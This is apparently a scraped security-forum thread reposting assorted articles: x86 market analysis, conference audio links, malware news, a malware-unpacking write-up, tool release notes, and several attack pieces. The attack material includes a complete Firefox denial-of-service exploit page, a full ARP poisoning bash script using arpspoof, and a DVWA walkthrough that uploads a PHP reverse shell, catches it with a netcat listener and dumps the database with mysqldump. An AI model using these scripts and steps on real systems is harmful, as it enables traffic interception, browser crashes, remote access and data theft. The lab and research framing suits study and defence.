discount off list prices to just achieve parity. The x86 architecture is supported by a massive ecosystem of suppliers (e.g., Applied Materials), customers (e.g., Dell), and complements (e.g., Microsoft Windows). If Intel and AMD are not able to fend off ARM, and the ARM architecture does displace x86, it would cause turbulence for a large number of companies. This turbulence is now real and visible. The major companies that makeup the x86 ecosystem, including producers (Intel and AMD), suppliers (e.g., Applied Materials), customers (e.g., Dell and HP), and complements (e.g., Microsoft), are all struggling to gain the confidence of investors. Each has underperformed stock market averages over the last two years and many are now implementing their own ARM-based strategies, remarkably even x86 stalwarts AMD and Microsoft. Meanwhile, Paul Otellini, Intel’s CEO, retired suddenly and unexpectedly, just last month.Intel, in particular, faces a precarious situation. It can harvest its tremendous profits in the PC market for the next several years or it can compete in the next generation of processors by aggressively developing low-margin processors and replicating ARM Holding’s licensing-based business model. [7] It’s a choice between serving a known, highly profitable market (in the shorter-term) and possibly winning in a comparatively unknown, unprofitable market (in the longer-term). As a professional executive or manager, which option would you choose? Thus we have the innovator’s dilemma.Join the discussion on Hacker News.If you’ve read this far, you should follow me on Twitter.— [1] This contrasts significantly with the sales impact from the launch of Windows 7, when sales of Windows PCs rose 49% during the first week Windows 7 was on sale, compared to the previous year. [2] While Apple has an instruction set license to execute ARM commands, it designed its own custom ARM compatible CPU core for the iPhone 5 and iPad 4. [3] Intel reports having 20 tablets in its pipeline for launch by the end of this year. [4] Intel’s efforts to create a new market segment for its x86 microprocessors, such as Ultrabooks, has thus far underperformed expectations. [5] I wasn’t able to find data on Intel processor shipments in 2011, but as a rough comparison, it looks like ARM and its licensees shipped 7.9b processors in 2011, while worldwide PC shipments totalled 352.8m units. In 2011, Intel had a roughly 80% market share in the PC market. [6] AMD had net loss in its latest quarter and thus you cannot compute a price to earnings ratio. [7] Intel could obtain an ARM license and enter the contract foundry business, but analysts expect such a move would also have a significant drag on its margins and profitability. Sursa: The End of x86? An Update
-
[Audio] Issues with security and networked object system From the Hacker Jeopardy winning team. He will discuss Issues with Security and Networked Object Systems, looking at some of the recent security issues found with activeX and detail some of the potentials and problems with network objects. Topics will include development of objects, distributed objects, standards, ActiveX, corba, and hacking objects. Size 23.3 MB Download: https://media.defcon.org/dc-5/audio/DEFCON%205%20Hacking%20Conference%20Presentation%20By%20Clovis%20-%20Issues%20with%20Security%20and%20Networked%20Object%20Systems%20-%20Audio.m4b Sursa: IT Security and Hacking knowledge base - SecDocs
-
[Audio] Packet Sniffing He will define the idea, explain everything from 802.2 frames down to the TCP datagram, and explain the mechanisms (NIT, bpf) that different platforms provide to allow the hack Size 25.2 MB Download: https://media.defcon.org/dc-5/audio/DEFCON%205%20Hacking%20Conference%20Presentation%20By%20Wrangler%20-%20Packet%20Sniffing%20-%20Audio.m4b Sursa: IT Security and Hacking knowledge base - SecDocs
-
[h=1]Security researchers identify malware infecting U.S. banks[/h] By Lucian Constantin, IDG News Service Dec 22, 2012 12:36 PM Security researchers from Symantec have identified an information-stealing Trojan program that was used to infect computer servers belonging to various U.S. financial institutions. Dubbed Stabuniq, the Trojan program was found on mail servers, firewalls, proxy servers, and gateways belonging to U.S. financial institutions, including banking firms and credit unions, Symantec software engineer Fred Gutierrez said Friday in a blog post. "Approximately half of unique IP addresses found with Trojan.Stabuniq belong to home users," Gutierrez said. "Another 11 percent belong to companies that deal with Internet security (due, perhaps, to these companies performing analysis of the threat). A staggering 39 percent, however, belong to financial institutions." (Also see "How to Avoid Malware.") Based on a map showing the threat's distribution in the U.S. that was published by Symantec, the vast majority of systems infected with Stabuniq are located in the eastern half of the country, with strong concentrations in the New York and Chicago areas. Compared to other Trojan programs, Stabuniq infected a relatively small number of computers, which seems to suggest that its authors might have targeted specific individuals and organizations, Gutierrez said. The malware was distributed using a combination of spam emails and malicious websites that hosted Web exploit toolkits. Such toolkits are commonly used to silently install malware on Web users' computers by exploiting vulnerabilities in outdated browser plug-ins like Flash Player, Adobe Reader, or Java. Once installed, the Stabuniq Trojan program collects information about the compromised computer, like its name, running processes, OS and service pack version, assigned IP (Internet Protocol) address and sends this information to command-and-control (C&C) servers operated by the attackers. "At this stage we believe the malware authors may simply be gathering information," Gutierrez said. Sursa: Security researchers identify malware infecting U.S. banks | PCWorld
-
[h=1]The Social Impact of Malware Infections[/h]I just had a good experience today about the “social impact” of malware infections and I would like to share it with you. For most infosec people, it is part of the game to play the fireman for family and friends when they are in trouble with their computer. The term “computer” is used by them as a generic term and includes the hardware, the software, the Internet connectivity, mailboxes, etc. Today it was again my turn to be contacted by a friend who received a “strange message” on his screen. That’s also typical, people see always strange message and even to not try to read and understand them! My wife picked up the call and said that my friend looked very affected and asked to call back asap… I quickly brought with my an emergency toolkit (a BackTrack on USB, some cables, USB sticks, a Windows DVD) and went to the front! Once arrived, my friend was very happy to see me and explained that while surfing on “some websites“, suddenly a message popped up! For me, it did not look like a regular malware infections: they usually try to install themselves and operate silently. My attention was focused on some words while he was describing the problem: “Police“, “They ask money“, “pornographic website“. Ok, it’s a ransomware! I booted the laptop offline to reproduce the malicious behaviour and saw this nice screen: (Click to enlarge) My friend and his wife were really very affected by this message and did not know how to react. They saw this as an intrusion in their private life. Worse, the displayed message referred to visits to child pornography websites! Of course, I was tempted to find the infection vector which was certainly a compromised (or malicious) website. But my goal was also to respect my friend’s privacy. I decided to simply get rid of the malware. Quite easy with one. It’s a common one and just display a pop-up window. There is no file encryption. I just booted in Emergency mode and reverted to the latest valid restore point. Case closed! Then I took some time to discuss with them and I realized how this story affected my friend (and his wife!). The infection happened Saturday evening. He did not sleep, he did not eat at all! He had 24 hours to pay 100 EUR and he spent the night with the following questions in mind: To pay or not to pay? Do I talk about this problem with my wife? But I never visited child pornography websites, how did they find this? Will the police catch me? Come to my house, seize my computer? How to report that I’m not a criminal? Hopefully, he had the good reaction and called me “because I’m working with computers” (like mentioned in the introduction). But not all people know other IT people and could benefit of free support. How will those people address the same kind of issue? His wife also had lot of questions: Does my husband really visit child pornography websites? Can I trust him again? Will the police catch him? Those friends are in couple for years and have a very stable life. Can you imagine the same story in a couple who has already social or financial problems? Or who want to divorce? This could completely change the rules of the game. This story really proves that bad guys are playing with the human behaviour to catch victims! It’s a pity that I did not found the website which delivered the malware to make a deeper analyzis but, once again, it’s my friend’s privacy! Let’s put the social aspect aside now, why he was infected? Hélas, I should say nothing new, regular mistakes: Using the computer with administrator rights Outdated AV No backup It’s amazing (in the right sense of the term) to see how such malwares use the human weaknesses and feelings (stress, shame, ignorance, …) to successfully perform their goal! Anyway, the case of closed for my friend. I’ll just need to continue the awareness trainings from time to time! Sursa: The Social Impact of Malware Infections | /dev/random
-
[h=3]Using DLL Injection to Automatically Unpack Malware[/h]In this post, I will present DLL injection by means of automatically unpacking malware. But first, the most important question: [h=2]What is DLL Injection and Reasons for Injecting a DLL[/h] DLL injection is one way of executing code in the context of another process. There are other techniques to execute code in another process, but essentially this is the easiest way to do it. As a DLL brings nifty features like automatic relocation of code good testability, you don't have to reinvent the wheel and do everything on your own. But why should you want to injecting a DLL into a foreign process? There are lots of reasons to inject a DLL. As you are within the process address space, you have full control over the process. You can read and write arbitrary memory locations, set hooks etc. with unsurpassed performance. You could basically do the same with a debugger, but it is way more convenient to do it in an injected DLL. Some showcases are: creation of cheats, trainers extracting passwords and encryption keys unpacking packed/encrypted executables To me, especially the opportunity of unpacking and decrypting malware is very interesting. Basically, most malware samples are packed by the same packer or family of packers. In the following, I will shortly summarize how it works. [h=3][/h] [h=2]The Malware Packer[/h] In order to evade anti-virus detection, the authors of the packer have devised an interesting unpacking procedure. Roughly, it can be summarized in the following stages: First, the unpacker stub does some inconspicuously looking stuff in order to thwart AV detection. The code is slightly obfuscated, but not as strong as to raise suspicion. Actually, the code that is being executed decrypts parts of the executable and jumps to it by self-modifying code. In the snippet below, you see how exactly the code is modified. The first instruction of the function that is supposedly called is changed to a jump to the newly decrypted code. mov [ebp+var_1], 0F6h mov al, [ebp+var_1] mov ecx, ptr_to_function xor al, 0A1h sub al, 6Eh mov [ecx], al ; =0xE9 mov ecx, ptr_to_function ... mov [ecx+1], eax ; delta to decrypted code ... call eax As you can see (after doing some math), an unconditional near jmp is inserted right at the beginning of the function to be called. Hence, by calling a supposedly normal function, the decrypted code is executed. The decrypted stub allocates some memory and copies the whole executable to that memory. Them it does some relocation (as the base address has changed) and executes the entry point of executable. In the following code excerpt, you can see the generic calculation of the entry point: mov edx, [ebp+newImageBase] mov ecx, [edx+3Ch] ; e_lfanew add ecx, edx ; get PE header ... mov ebx, [ecx+28h] ; get AddressOfEntryPoint add ebx, edx ; add imageBase ... mov [ebp+vaOfEntryPoint], ebx ... mov ebx, [ebp+vaOfEntryPoint] ... call ebx Here, the next stage begins. At first glance it seems the same code is executed twice, but naturally, there's a deviation in control flow. For example, the the packer authors had to make sure that the encrypted code doesn't get decrypted twice. For that, they declared a global variable which in this sample initially holds the value 0x6E6C82B7. So upon first execution, the variable alreadyDecrypted is set to zero. mov eax, alreadyDecrypted cmp eax, 6E6C82B7h jnz dontInitialize ... mov alreadyDecrypted, 0 dontInitialize: ... In the decryption function, that variable is checked for zero, as you can see/calculate in the following snippet: mov [ebp+const_0DF2EF03], 0DF2EF03h mov edi, 75683572h mov esi, 789ADA71h mov eax, [ebp+const_0DF2EF03] mov ecx, alreadyDecrypted xor eax, edi sub eax, esi cmp eax, ecx ; eax = 0 jnz dontDecrypt Once more, you see the obfuscation employed by the packer. Then, a lengthy function is executed that takes care of the actual unpacking process. It comprises the following steps: gather chunks of the packed program from the executable memory space BASE64-decode it decompress it write it section by section to the original executable's memory space, effectively overwriting all of the original code fix imports etc. After that, the OEP (original entry point) is called. The image below depicts a typical OEP of an unspecified malware. Note that after a call to some initialization function, the first API function it calls is SetErrorMode. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Code at the OEP [/TD] [TD=class: tr-caption, align: center][/TD] [TD=class: tr-caption, align: center][/TD] [/TR] [/TABLE] [h=3]Weaknesses[/h] What are possible points to attack the unpacking process? Basically, you can grab the unpacked binary at two points: first, when it is completely unpacked on the heap, but not yet written to the original executable's image space, and second, once the malware has reached its OEP. The second option is the most common and generic one when unpacking binaries, so I will explain that one. Naturally, you can write a static unpacker and perhaps one of my future posts will deal with that. One of the largest weaknesses are the memory allocations and setting the appropriate access rights. As a matter of fact, in order to write to the original executable's memory, the unpacker grants RWE access to the whole image space. Hence, it has no problems accessing and executing all data and code contained in it. If you set a breakpoint on VirtualProtect, you will see what I mean. There are very distinct calls to this function and the one setting the appropriate rights to the whole image space really sticks out. After a little research, I found two articles dealing with the unpacking process of the packer (here and here), but both seem not aware that the technique presented in the following is really easily implemented. Once you have reached the VirtualProtect call that changes the access rights to RWE, you can change the flags to RW-only, hence execution of the unpacked binary will not be possible. So, once the unpacker tries to jump to the OEP, an exception will be raised due to missing execution rights. So, now that we know the correct location where to break the packer, how to unpack malware automatically? Here DLL injection enters the scene. The basic idea is very simple: start the binary in suspended state inject a DLL this DLL sets a hook on VirtualProtect, changing RWE to RW at the correct place as backup, a hook on SetErrorMode is set. Hence, when encountering unknown packers, the binary won't be executed for too long. [*]resume the process Some other things have to be taken care of, like correctly dumping the process and rebuilding imports, but these are out of the scope of this article. If you encounter them yourself and don't know how to handle them, just ask me ;-) It seems not too easy to find a decent DLL injector. Especially, one that injects a DLL before the program starts (if there is one around, please tell me). As I could not find an injector that is capable of injecting right at program start, I coded my own. You can find it at my GitHub page. It uses code from Jan Newger, so kudos to him. I'm particularly fond of using test-driven development employing the googletest framework ;-) [h=3]Conclusion[/h] The presented technique works very well against the unpacker. So far, I've encountered about 50 samples and almost all can be unpacked using this technique. Furthermore, all unpackers that overwrite the original executable's image space can be unpacked by this technique. In future posts, I will evaluate this technique against other packers. Eingestellt von Sebastian Eschweiler um 03:20 Sursa: Malware Muncher: Using DLL Injection to Automatically Unpack Malware
-
Disabling Antivirus Program(S) Description: PDF : - https://hacktivity.com/en/downloads/archives/185/ Bachelor’s Degree in Computer Science at Faculty of Software Engineering at College of Nyiregyhaza. He got more than 9 years of experience on the field of it security, mostly in designing and creating security related products like DLP (data lost prevention) solutions and system log collectors. He was a developer of a widely known open source tool syslog-ng. Currently working as an IT security consultant and researcher at the BDO MITM Kft. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Sursa: Disabling Antivirus Program(S)
-
File Upload Exploitation File upload vulnerabilities consists a major threat for web applications.A penetration tester can use a file upload form in order to upload different types of files that will allow him to obtain information about the web server or even a shell.Of course shell is always a goal but a good penetration tester must not stop there.Further activities can be performed after the shell.The focus of these activities must be on the database.In this article we will see how we can obtain a shell from the exploitation of file upload on a Linux web server and how we can dump the database that is running on the system. Backtrack includes a variety of web shells for different technologies like PHP,ASP etc.In our example we will use the damn vulnerable web application which is written in PHP in order to attack the web server through the file upload.The web shell that we will use in our case it will be the php-reverse-shell. uploading the web shell Now we have to set our machine to listen on the same port as our web shell.We can do this with netcat and the command nc -lvp 4444.The next step is to go back to the web application and to try to access the URL that the PHP reverse shell exists.We will notice that it will return a shell to our console: Obtaining a shell So we have compromise the remote web server and we can execute further commands from our shell-like a simple ls in order to discover directories. Listing Directories Now it is time to dump the database.We will have to go to the directory with the name uploads because this directory has write permissions and it is visible to the outside world which means that we can access it and we can create a file.Then we can use the following command in order to dump the database to a file. mysqldump -u root -p dvwa > hacked_db.sql We already know that the user root exists because it is already logged into the system.Also it is very common the name of the application or of the company to be the database name so we will use the dvwa.The > sign will create a file inside the uploads directory with the name hacked_db.sql. Dumping the database to a file As we can see from the image above we had to provide a password.In this scenario we just pressed enter without submitting anything.In a real world penetration test it would be much more difficult however it is always a good practice to try some of the common passwords.The next two images are showing the dump of the dvwa database. Dump of DVWA database Dump of DVWA database 2 From the last image we can see that we even obtain the password hash of the admin which it can be cracked by using a tool like john the ripper.This is also important as we may want to have the admin privileges and into the application. Conclusion In this article we saw how we can obtain a shell by exploiting a file upload form of an application and how we can dump the database.Of course in a real world scenario it is more likely restrictions to be in place but it good to know the methodology and the technique that we must follow once we have managed to upload our web shell. Sursa: File Upload Exploitation
-
[h=2]Mozilla Firefox 14.0.1 Denial of Service Vulnerability[/h]Author: knowlegend <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>FF-14.0.1 DoS-Exploit by Know v3.0</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <meta name="Description" content="FF-14.0.1 DoS-Exploit by Know v3.0" /> <script type="text/javascript" language="JavaScript"> var CrashIt = false; if (typeof CrashIt != 'undefined') { CrashIt = new XMLHttpRequest(); } if (!CrashIt) { try { CrashIt = new ActiveXObject("Msxml2.XMLHTTP"); } catch(e) { try { CrashIt = new ActiveXObject("Microsoft.XMLHTTP"); } catch(e) { CrashIt = null; } } } function load() { CrashIt.open('get','bla.php'); CrashIt.onreadystatechange = handleContent; CrashIt.send(null); return false; } function handleContent() { while(CrashIt.readyState != 4) { document.getElementById('inhalt').innerHTML = "pwnd"; } document.getElementById('inhalt').innerHTML = CrashIt.responseText; } </script> </head> <body onload="load();"> <div id="inhalt"></div> <body> </html> # 1337day.com [2012-12-23] Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
-
[h=3]Fast Network cracker Hydra v 7.4[/h] One of the biggest security holes are passwords, as every password security study shows. A very fast network logon cracker which support many different services, THC-Hydra is now updated to 7.4 version Hydra available for Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1 and OSX, Currently supports AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP. Change Log New module: SSHKEY - for testing for ssh private keys (thanks to deadbyte(at)toucan-system(dot)com!) Added support for win8 and win2012 server to the RDP module Better target distribution if -M is used Added colored output (needs libcurses) Better library detection for current Cygwin and OS X Fixed the -W option Fixed a bug when the -e option was used without -u, -l, -L or -C, only half of the logins were tested Fixed HTTP Form module false positive when no answer was received from the server Fixed SMB module return code for invalid hours logon and LM auth disabled Fixed http-{get|post-form} from xhydra Added OS/390 mainframe 64bit support (thanks to dan(at)danny(dot)cz) Added limits to input files for -L, -P, -C and -M - people were using unhealthy large files! ;-) Added debug mode option to usage (thanks to Anold Black) Download THC-Hydra 7.4 Sursa: Fast Network cracker Hydra v 7.4 updated version download - Hacker News , Security updates
-
Arachni Web Application Security Scanner Framework Web application hacking is very common and there are so many tools that can exploit the web application vulnerabilities like SQL injection, XSS, RFI, LFI and others. The vary first step is to find the vulnerabilities on web application. Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. So in this article I will show you how to get and install arachni and how to launch your first attack against a web application. DownloadArachni Since I am on Linux backtrack 5 R1 but you can use other Linux distribution like ubuntu. Start the web mode of arachni. root@bt:~/Downloads/arachni-v0.4.0.2-cde# sh arachni_web Now the question is how to edit Dispatchers of Arachni because without dispatchers arachni does not work. root@bt:~/Downloads/arachni-v0.4.0.2-cde# sh arachni_rpcd Now click on the plug ins to choose the best plug ins then click on the module to select and unselected modules depends on your need. Now click on the start scan to run your first scan enter the URL of the target web application then simply start the attack, after sometimes you need to evaluate the report to get the vulnerabilities. Sursa: Arachni Web Application Security Scanner Framework Tutorial | Ethical Hacking-Your Way To The World Of IT Security
-
[h=2]ARP Poisoning Script[/h]The purpose of this script is to automate the process of ARP poison attacks.The attacker must only insert the IP address of the target and the IP of the Gateway.This script was coded by Travis Phillips and you can find the source code below: #!/bin/bash niccard=eth1 if [[ $EUID -ne 0 ]]; then echo -e "\n\t\t\t33[1m 33[31m Script must be run as root! 33[0m \n" echo -e "\t\t\t Example: sudo $0 \n" exit 1 else echo -e "\n33[1;32m#######################################" echo -e "# ARP Poison Script #" echo -e "#######################################" echo -e " 33[1;31mCoded By:33[0m Travis Phillips" echo -e " 33[1;31mDate Released:33[0m 03/27/2012" echo -e " 33[1;31mWebsite:33[0m http://theunl33t.blogspot.com\n33[0m" echo -n "Please enter target's IP: " read victimIP echo -n "Please enter Gateway's IP: " read gatewayIP echo -e "\n\t\t ---===[Time to Pwn]===---\n\n\n" echo -e "\t\t--==[Targets]==--" echo -e "\t\tTarget: $victimIP" echo -e "\t\tGateway: $gatewayIP \n\n" echo -e " [*] Enabling IP Forwarding \n" echo "1" > /proc/sys/net/ipv4/ip_forward echo -e " [*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n" xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" & fi ARP poison script Sursa: https://pentestlab.wordpress.com/2012/12/22/arp-poisoning-script/
-
[h=1]Samhain 3.0.9![/h]by Mayuresh on December 22, 2012 For open source HIDS lovers, we have an updated release of Samhain! It is the bugfixed Samhain version 3.0.9 ! Our original post about Samhain can be found here. Samhain 3.0.9 “The Samhain open source host-based intrusion detection system (HIDS) provides file integrity checking and logfile monitoring/analysis, as well as rootkit detection, port monitoring, detection of rogue SUID executables, and hidden processes. It has been designed to monitor multiple hosts with potentially different operating systems, providing centralized logging and maintenance, although it can also be used as standalone application on a single host. Samhain is an open-source multiplatform application for POSIX systems (Unix, Linux, Cygwin/Windows).“ Official change log for Samhain 3.0.9: Some build errors have been fixed. The ‘probe’ command for the server has been fixed (clients could be erroneously omitted under certain conditions). An option ‘IgnoreTimestampsOnly’ has been added to the Windows registry check (ignore changes if only timestamp has changed). Full scans requested by the inotify module will now only run at times configured for full scans anyway. [h=3]Download Samhain:[/h] Samhain 3.0.9 – samhain-current.tar.gz/samhain-3.0.9.tar.gz Sursa: Samhain version 3.0.9! — PenTestIT
-
GNUnet P2P Framework 0.9.5 Authored by Christian Grothoff | Site ovmj.org GNUnet is a peer-to-peer framework with focus on providing security. All peer-to-peer messages in the network are confidential and authenticated. The framework provides a transport abstraction layer and can currently encapsulate the network traffic in UDP (IPv4 and IPv6), TCP (IPv4 and IPv6), HTTP, or SMTP messages. GNUnet supports accounting to provide contributing nodes with better service. The primary service build on top of the framework is anonymous file sharing. Changes: This release adds support for non-anonymous data transfers over multiple hops (if both publisher and replicator are using an anonymity level of zero). It fixes various bugs and includes cosmetic improvements in the gnunet-setup and gnunet-fs-gtk user interfaces. Download: http://packetstormsecurity.org/files/download/119046/gnunet-0.9.5.tar.gz Sursa: GNUnet P2P Framework 0.9.5 ? Packet Storm
-
Entropy Broker RNG 2.1 Authored by Folkert van Heusden | Site vanheusden.com Entropy Broker is an infrastructure for distributing cryptographically secure random numbers (entropy data) from one or more servers to one or more clients. Entropy Broker allows you to distribute entropy data (random values) to /dev/random devices from other systems (real servers or virtualised systems). It helps preventing that the /dev/random device gets depleted; an empty /dev/random-device can cause programs to hang (waiting for entropy data to become available). This is useful for systems that need to generate encryption keys, run VPN software or run a casino website. Changes: This release adds a Web interface for viewing usage statistics, per-user bandwidth limits, and many small fixes. Download: http://packetstormsecurity.org/files/download/119047/eb-2.1.tgz Sursa: Entropy Broker RNG 2.1 ? Packet Storm
-
Bluefog 0.0.2 Authored by Tom Nardi | Site digifail.com Bluefog is a tool that can generate an essentially unlimited number of phantom Bluetooth devices. It can be used to test Bluetooth scanning and monitoring systems, make it more difficult for attackers to lock onto your devices, or otherwise complicate the normal operation of Bluetooth devices. Technically, Bluefog can work with just one Bluetooth adapter, but it works much better when you connect multiple adapters. Up to four radios are currently supported simultaneously. Changes: This release is in the very early stages of development and there are some areas of the software which need attention and improvement. There is currently very little in the way of error checking. Download: http://packetstormsecurity.org/files/download/119045/bluefog-0.0.2.tar.gz Sursa: Bluefog 0.0.2 ? Packet Storm
-
Exista secimg.php pentru imagini, atat in posturi cat si in semnatura. Iar anonimizarea link-urilor (referrer)... Nu ai specificat DE CE ar fi necesara.